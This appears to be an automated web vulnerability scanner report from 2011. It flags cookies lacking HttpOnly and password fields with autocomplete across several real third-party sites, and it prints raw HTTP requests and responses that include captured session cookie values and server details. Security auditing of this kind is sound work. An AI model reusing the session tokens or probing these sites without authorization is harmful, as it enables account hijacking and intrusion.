HTTP/1.0 302 Found Date: Mon, 02 May 2011 22:27:11 GMT Server: hi Status: 302 Found Location: http://twitter.com/login?redirect_after_login=%2Fhome X-Runtime: 0.00223 Content-Type: text/html; charset=utf-8 Content-Length: 119 Cache-Control: no-cache, max-age=300 Set-Cookie: k=173.193.214.243.1304375231389892; path=/; expires=Mon, 09-May-11 22:27:11 GMT; domain=.twitter.com Set-Cookie: guest_id=130437523139125964; path=/; expires=Wed, 01 Jun 2011 22:27:11 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CToOcmV0dXJuX3RvIhxodHRwOi8vdHdpdHRlci5jb20vaG9tZToPY3Jl%250AYXRlZF9hdGwrCKCD0rIvAToHaWQiJWVkMDQwMDM5MTUxZDJkNmI5OGQzMjky%250AZjFjYjE1ZDEwIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6%250ARmxhc2hIYXNoewAGOgpAdXNlZHsA--e2b470aa48dea5747a392b14a3b018beebbcd5c9; domain=.twitter.com; path=/; HttpOnly Expires: Mon, 02 May 2011 22:32:11 GMT X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<html><body>You are being <a href="http://twitter.com/login?redirect_after_login=%2Fhome">redirected</a>.</body></html>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /docs/gated/campaigns/bpm_search3.htm HTTP/1.1 Host: web.progress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.progress.com/SmCreateCookie.ccc?SMSE ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Tue, 03 May 2011 00:06:39 GMT Server: Microsoft-IIS/7.0 Cache-Control: public Content-Length: 99445 Content-Type: application/x-javascript; charset=utf-8 Expires: Tue, 01 May 2012 23:22:04 GMT Last-Modified: Mon, 02 May 2011 23:22:04 GMT X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Set-Cookie: pwH75TpzXX=MDAwM2IyNGU3NzQwMDA2NDY0MDEwYBE/JH4xMzA0MzkwMTY2;path=/ Connection: close
//---------------------------------------------------------- // Copyright (C) Microsoft Corporation. All rights reserved. //---------------------------------------------------------- // MicrosoftAj ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Tue, 03 May 2011 00:06:32 GMT Server: Microsoft-IIS/7.0 Cache-Control: private,max-age=0 Content-Length: 19292 Content-Type: text/css Last-Modified: Tue, 03 Aug 2010 12:13:08 GMT ETag: "{3AFB89F0-1597-4AFD-8D80-6CC8FEC2A732},79" ResourceTag: rt:3AFB89F0-1597-4AFD-8D80-6CC8FEC2A732@00000000079 Exires: Mon, 18 Apr 2011 00:03:11 GMT Public-Extension: http://schemas.microsoft.com/repl-2 X-Powered-By: ASP.NET Set-Cookie: pwH75TpzXX=MDAwM2IyNGU3NzQwMDA2NDY0MDEwAndPIlkxMzA0MzkwMTU5;path=/ Connection: close
/* STILE AM 2009 */
html, body {} html, body {font-family:"Lucida Sans Unicode","Lucida Grande",Verdana,Arial,Helvetica,sans-serif;} body {font-size:12px; margin:0; padding:0;} strong, em, b, i, ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Tue, 03 May 2011 00:06:33 GMT Server: Microsoft-IIS/7.0 Cache-Control: private,max-age=0 Content-Length: 17402 Content-Type: application/x-javascript Last-Modified: Fri, 11 Dec 2009 14:44:45 GMT ETag: "{56DF34FC-A182-47D6-98D5-5D12CA72330A},46" ResourceTag: rt:56DF34FC-A182-47D6-98D5-5D12CA72330A@00000000046 Exires: Mon, 18 Apr 2011 00:02:47 GMT Public-Extension: http://schemas.microsoft.com/repl-2 X-Powered-By: ASP.NET Set-Cookie: pwH75TpzXX=MDAwM2IyNGU3NzQwMDA2NDY0MDEwORIaCQsxMzA0MzkwMTYw;path=/ Connection: close
function Main(Day, Month, Year, Glong, Glat, TimeNow, TimeZone, DayNum, ImageDay, ImageNight) { var OutString = ""; var calend; var quady = new Array; var sunp = new Array;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Tue, 03 May 2011 00:06:35 GMT Server: Microsoft-IIS/7.0 Cache-Control: max-age=31536000 Content-Type: application/x-javascript Last-Modified: Wed, 08 Nov 2006 17:17:58 GMT Accept-Ranges: bytes ETag: "027f6d5593c71:0" X-Powered-By: ASP.NET Content-Length: 105258 Set-Cookie: pwH75TpzXX=MDAwM2IyNGU3NzQwMDA2NDY0MDEweQJwBzkxMzA0MzkwMTYy;path=/ Connection: close
var StrNewNamespace="http://schemas.microsoft.com/WebPart/v2"; function SplitIndex(Index) { var sPropURN=""; var sPropName=""; var pos=Index.lastIndexOf("#"); if( -1==pos ) { pos=Index. ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Tue, 03 May 2011 00:06:34 GMT Server: Microsoft-IIS/7.0 Cache-Control: max-age=31536000 Content-Type: application/x-javascript Last-Modified: Fri, 21 Nov 2008 03:41:10 GMT Accept-Ranges: bytes ETag: "0cf40fe8a4bc91:0" X-Powered-By: ASP.NET Content-Length: 69979 Set-Cookie: pwH75TpzXX=MDAwM2IyNGU3NzQwMDA2NDY0MDEwf2AzTSoxMzA0MzkwMTYx;path=/ Connection: close
...function Browseris () { var agt=navigator.userAgent.toLowerCase(); this.osver=1.0; if (agt) { var stOSVer=agt.substring(agt.indexOf("windows ")+11); this.osver=parseFloat(stOSVer);
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Tue, 03 May 2011 00:06:35 GMT Server: Microsoft-IIS/7.0 Cache-Control: max-age=31536000 Content-Type: application/x-javascript Last-Modified: Mon, 13 Nov 2006 01:43:56 GMT Accept-Ranges: bytes ETag: "056642ec56c71:0" X-Powered-By: ASP.NET Content-Length: 4260 Set-Cookie: pwH75TpzXX=MDAwM2IyNGU3NzQwMDA2NDY0MDEwX2NvUTkxMzA0MzkwMTYy;path=/ Connection: close
...function MSOWebPartPage_GetLocalizedStrings() { var L_ResetPagePersonalizationDialog_TXT="Tutte le web part personalizzate verranno reimpostate sui relativi valori condivisi e le eventuali web p ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.altergaz.fr Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:29:09 GMT Server: Apache X-Powered-By: PHP/5.2.6-1+lenny10 Set-Cookie: fe_typo_user=a61d48dbb4958bc70d275865af261a96; path=/ Connection: close Content-Type: text/html; charset=iso-8859-15 Content-Length: 22446
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.camera.it Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /1 HTTP/1.1 Host: www.camera.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _xmcamera=BAh7BiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsIOgtub3RpY2UwOgplcnJvcjA6DHdhcm5pbmcwBjoKQHVzZWR7CDsG%250AVDsHVDsIVA%253D%253D--84f86c2ccc477bfc838891a4b6e8156295c20250;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.distrigas.eu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Connection: close Date: Mon, 02 May 2011 22:29:20 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Generated-By: Smartsite iXperion version 1.1.239.2 Location: http://www.distrigas.eu/Content/Intro.html Set-Cookie: DistrigasPrd_guid=04e53fb0-c72a-4e30-a4e6-ae4f019a6ae1; expires=Tue, 01-May-2012 22:29:20 GMT; path=/ Set-Cookie: ASP.NET_SessionId=vbq2nn552gxbt1ytt0gnne55; path=/; HttpOnly Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 159
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.distrigas.eu/Content/Intro.html">here</a>.</h2> </body></html>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.energyfordevelopment.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Mon, 02 May 2011 22:29:59 GMT Location: http://www.eni.com/en_IT/energy-for-development Content-Length: 255 Connection: close Content-Type: text/html; charset=iso-8859-1 Set-Cookie: TS782077=9c1888cf55d1ed60c1dc7e8ec33b9df22bf72ca75ced7b654dbf3067; Path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www.eni.com/en_I ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.eni.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www.eni.com/en_I ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 404 Not Found Date: Mon, 02 May 2011 23:56:07 GMT Last-Modified: Fri, 23 Nov 2007 17:18:15 GMT ETag: "10e6e-4b2-ccc843c0" Accept-Ranges: bytes Content-Length: 1202 Content-Type: text/html Set-Cookie: TS782077=11a595a37cc910c0139fc7e1bfd8a6ae890c9539588bfa0e4dbf4496; Path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" con ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /attachments/azienda/profilo-compagnia/eni_sintesi_eng.pdf HTTP/1.1 Host: www.eni.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=kyRMN1sbqWqGzncyJW4WbfPF2w7n8bdv9SYHRTc7ZYJktn5rHVXg!-2020469318; TS782077=89ee84e16a43f8e45319ff52ca76dd83212a69bccb46787c4dbf2c78; WT_FPC=id=173.193.214.243-768797744.30148886:lv=1304414014591:ss=1304414014591;
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:29:59 GMT Last-Modified: Fri, 18 Feb 2011 16:25:19 GMT ETag: "28228-70200-f5bef9c0" Accept-Ranges: bytes Content-Length: 459264 Connection: close Content-Type: application/pdf Set-Cookie: TS782077=b68bf7a0a48de83f01a85b36ebfb4752212a69bccb46787c4dbf3067; Path=/
%PDF-1.7%.... 14 0 obj<</Linearized 1/L 380095/O 16/E 293952/N 2/T 379700/H [ 3296 525]>>endobj xref14 1500000000016 00000 n 0000003821 00000 n 0000003992 00000 n 0000005004 0 ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /attachments/media/press-release/2010/10/press-release-2010-third-quarter-results.pdf HTTP/1.1 Host: www.eni.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=kyRMN1sbqWqGzncyJW4WbfPF2w7n8bdv9SYHRTc7ZYJktn5rHVXg!-2020469318; TS782077=89ee84e16a43f8e45319ff52ca76dd83212a69bccb46787c4dbf2c78; WT_FPC=id=173.193.214.243-768797744.30148886:lv=1304414014591:ss=1304414014591;
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:29:59 GMT Last-Modified: Tue, 02 Nov 2010 15:12:45 GMT ETag: "42c70-1f7c7e-5b5db540" Accept-Ranges: bytes Content-Length: 2063486 Connection: close Content-Type: application/pdf Set-Cookie: TS782077=b68bf7a0a48de83f01a85b36ebfb4752212a69bccb46787c4dbf3067; Path=/
%PDF-1.5%.... 132 0 obj<</Linearized 1/L 345754/O 134/E 69693/N 44/T 342998/H [ 1376 1442]>>endobj xref132 540000000016 00000 n 0000002818 00000 n 0000002920 00000 n 0000003421 0 ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /attachments/media/press-release/2011/02/press-release-2010-fourth-quarter-results.pdf HTTP/1.1 Host: www.eni.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=kyRMN1sbqWqGzncyJW4WbfPF2w7n8bdv9SYHRTc7ZYJktn5rHVXg!-2020469318; TS782077=89ee84e16a43f8e45319ff52ca76dd83212a69bccb46787c4dbf2c78; WT_FPC=id=173.193.214.243-768797744.30148886:lv=1304414014591:ss=1304414014591;
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:29:59 GMT Last-Modified: Fri, 18 Feb 2011 15:46:18 GMT ETag: "3d396-3e0a86-6a362680" Accept-Ranges: bytes Content-Length: 4065926 Connection: close Content-Type: application/pdf Set-Cookie: TS782077=b68bf7a0a48de83f01a85b36ebfb4752212a69bccb46787c4dbf3067; Path=/
%PDF-1.3%.... 145 0 obj <</Linearized 1/L 437664/O 147/E 96545/N 50/T 434716/H [ 1396 1369]>>endobj xref 145 55 0000000016 00000 n 0000002765 00000 n 0000002866 00000 n 0000003351 ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /attachments/media/press-release/2011/04/press-release-2011-first-quarter-results.pdf HTTP/1.1 Host: www.eni.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=kyRMN1sbqWqGzncyJW4WbfPF2w7n8bdv9SYHRTc7ZYJktn5rHVXg!-2020469318; TS782077=89ee84e16a43f8e45319ff52ca76dd83212a69bccb46787c4dbf2c78; WT_FPC=id=173.193.214.243-768797744.30148886:lv=1304414014591:ss=1304414014591;
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:30:01 GMT Last-Modified: Wed, 27 Apr 2011 10:58:44 GMT ETag: "43d18-89a9a-53008100" Accept-Ranges: bytes Content-Length: 563866 Connection: close Content-Type: application/pdf Set-Cookie: TS782077=804c4d0ed7500992d2b3fd3460f7dfcf212a69bccb46787c4dbf3069; Path=/
%PDF-1.5%.... 115 0 obj<</Linearized 1/L 384938/O 117/E 54050/N 39/T 382522/H [ 1196 1346]>>endobj xref115 450000000016 00000 n 0000002542 00000 n 0000002644 00000 n 0000003119 0 ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /attachments/publications/reports/reports-2009/Eni-in-2009.pdf HTTP/1.1 Host: www.eni.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=kyRMN1sbqWqGzncyJW4WbfPF2w7n8bdv9SYHRTc7ZYJktn5rHVXg!-2020469318; TS782077=89ee84e16a43f8e45319ff52ca76dd83212a69bccb46787c4dbf2c78; WT_FPC=id=173.193.214.243-768797744.30148886:lv=1304414014591:ss=1304414014591;
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:30:24 GMT Last-Modified: Wed, 04 Aug 2010 10:44:59 GMT ETag: "1f5a5-e3b92b-200a40c0" Accept-Ranges: bytes Content-Length: 14924075 Connection: close Content-Type: application/pdf Set-Cookie: TS782077=0990764a7a46e640eb200f24e6af5418212a69bccb46787c4dbf307f; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 404 Not Found Date: Mon, 02 May 2011 22:19:02 GMT Last-Modified: Fri, 23 Nov 2007 17:18:15 GMT ETag: "10e6e-4b2-ccc843c0" Accept-Ranges: bytes Content-Length: 1202 Content-Type: text/html Set-Cookie: TS782077=5d49424e190a245063ff5ee0922b91a6212a69bccb46787c4dbf2dd6; Path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" con ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 404 Not Found Date: Mon, 02 May 2011 22:19:05 GMT Last-Modified: Fri, 23 Nov 2007 17:18:15 GMT ETag: "10e6e-4b2-ccc843c0" Accept-Ranges: bytes Content-Length: 1202 Content-Type: text/html Set-Cookie: TS782077=a5e92bf5adae60507c76683cb270ea93212a69bccb46787c4dbf2dd9; Path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" con ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.eni.it Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www.eni.com/">he ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www.eni.com/mobi ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
wwweni=r2744327987; path=/; expires=Fri, 1 Jan 2010 01:01:50 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /?home_2010_en_tab=header_tools HTTP/1.1 Host: www.eni.mobi Proxy-Connection: keep-alive Referer: http://www.eni.com/en_IT/home.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 301 Moved Permanently Set-Cookie: wwweni=r2744327987; path=/; expires=Fri, 1 Jan 2010 01:01:50 GMT Date: Mon, 02 May 2011 23:55:17 GMT Server: Apache Location: http://www.eni.it/mobile/page.do?locale=it_IT&content=home Content-Length: 270 Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www.eni.it/mobil ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /150772050830724/wt.pl?p=203,us,1,1920x1200,16,1,1304392516867,0,1074x903,1&tz=-5&enc1=?&enc2=utf-8utf-8&la=en-US&cg1=WEBSITE&cg2=US&cg3=HOME&np=Shockwave%20Flash%7CJava HTTP/1.1 Host: zanox01.webtrekk.net Proxy-Connection: keep-alive Referer: http://www.zanox.com/us/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Set-Cookie: wteid_150772050830724=4130437487300145330; Expires=Tue, 05-Apr-2016 22:21:13 GMT Set-Cookie: wtsid_150772050830724=1 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, proxy-revalidate, private, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Mon, 02 May 2011 22:21:13 GMT P3P: policyref="http://track.webtrekk.de/w3c/p3p.xml", CP="NOI DSP IND COM NAV INT" Content-Type: image/gif;charset=UTF-8 Content-Length: 43 Date: Mon, 02 May 2011 22:21:12 GMT Server: q3/4
GIF89a.............!.......,...........D..;
16. Password field with autocomplete enabledpreviousnext There are 28 instances of this issue:
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
The form contains the following password fields with autocomplete enabled:
password
passwordConfirm
Request
GET /utenti/Registrazione.aspx HTTP/1.1 Host: du.ilsole24ore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 02 May 2011 22:24:07 GMT Server: Microsoft-IIS/6.0 SERVER: PRODFE1 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 60355
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The form contains the following password field with autocomplete enabled:
txtPassword
Request
GET /utenti/facebook_connect.aspx HTTP/1.1 Host: du.ilsole24ore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 02 May 2011 22:24:07 GMT Server: Microsoft-IIS/6.0 SERVER: PRODFE1 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 14607
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:30:24 GMT Server: Apache Accept-Ranges: bytes Content-Length: 6649 Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head>
HTTP/1.0 200 OK Date: Mon, 02 May 2011 21:30:41 GMT Last-Modified: Mon, 02 May 2011 21:30:41 GMT Set-Cookie: MIAMISESSION=4d1567b8-7503-11e0-b300-00008a0c593d:3481824641; path=/; domain=.sciencedirect.com; HttpOnly; Content-Type: text/html Expires: Tue, 01 Jan 1980 04:00:00 GMT X-RE-Ref: 0 -1136083128 Server: www.sciencedirect.com 9999 138.12.6.33:443 P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "_http://www.w3.org/TR/html4/loose.dtd" > <html> <head>
Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.
Issue remediation
